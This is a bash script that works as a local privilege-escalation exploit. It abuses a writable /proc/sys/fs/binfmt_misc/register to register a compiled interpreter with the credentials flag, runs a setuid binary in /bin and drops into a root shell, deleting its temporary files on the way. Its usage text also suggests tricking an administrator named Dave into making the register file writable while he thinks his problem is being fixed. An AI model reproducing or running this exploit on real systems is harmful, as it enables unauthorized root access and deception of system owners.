#!/bin/bash

searchsuid="/bin/"
mountpoint="/proc/sys/fs/binfmt_misc"
exe="$0"


warn()
{
    1>&2 echo $@
}

die()
{
    warn $@
    exit -1
}

usage()
{
    cat <<EOF
Usage: $exe
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave is
    thinking that you are fixing his problem.
EOF
    exit 1
}

function not_writeable()
{
	test ! -w "$mountpoint/register"
}

function pick_suid()
{
	find "$1" -perm -4000 -print|while read -r candidate;
	do
		test -x "$candidate" || continue
		echo "$candidate"
	done|tail -n 1
}

function read_magic()
{
	(grep -q -o "'" <<< "$1") && return 1
	(egrep -q -o "[^0-9]" <<< "$2") && return 1
	python2 -c "print(open('$1', 'rb').read()[:$2].replace('"'\x00'"', '"'\\x00'"'))"
}

[[ -n "$1" ]] && usage

not_writeable && die "Error: $mountpoint/register is not writeable"

target="$(pick_suid "$searchsuid")"
test -z "$target" && echo "Error: Unable to find a suid binary in $searchsuid" && exit 1

binfmt_magic="$(read_magic "$target" "126")"
test -z "$binfmt_magic" && echo "Error: Unable to retrieve a magic for $target" && exit 1

fmtsrc="$(mktemp /tmp/XXXXXXXX.c)"
fmtname="$(mktemp -u XXXX)"
fmtinterpr="$(mktemp)"

(cat > "$fmtsrc") <<- __EOF__
	#include <stdlib.h>
	#include <unistd.h>
	#include <stdio.h>
	#include <pwd.h>

	int main(int argc, char *argv[])
	{
		// remove our temporary files
		unlink("$fmtsrc");
		unlink("$fmtinterpr");

		// remove the unused binary format
		FILE* fmt = fopen("$mountpoint/$fmtname", "w");
		fprintf(fmt, "-1\\n");
		fclose(fmt);

		// MOTD
		setuid(0);
		uid_t uid = getuid();
		uid_t euid = geteuid();
		struct passwd *pw = getpwuid(uid);
		struct passwd *epw = getpwuid(euid);
		fprintf(stderr, "uid=%u(%s) euid=%u(%s)\\n",
			uid,
			pw->pw_name,
			euid,
			epw->pw_name);

		// welcome home
		char* sh[] = {"/bin/sh", (char*) 0};
		execvp(sh[0], sh);
		return 1;
	}
__EOF__
gcc -o "$fmtinterpr" "$fmtsrc" || exit 1
chmod a+x "$fmtinterpr"

binfmt_line="_${fmtname}_M__${binfmt_magic}__${fmtinterpr}_OC"
echo "$binfmt_line" > "$mountpoint"/register

exec "$target"
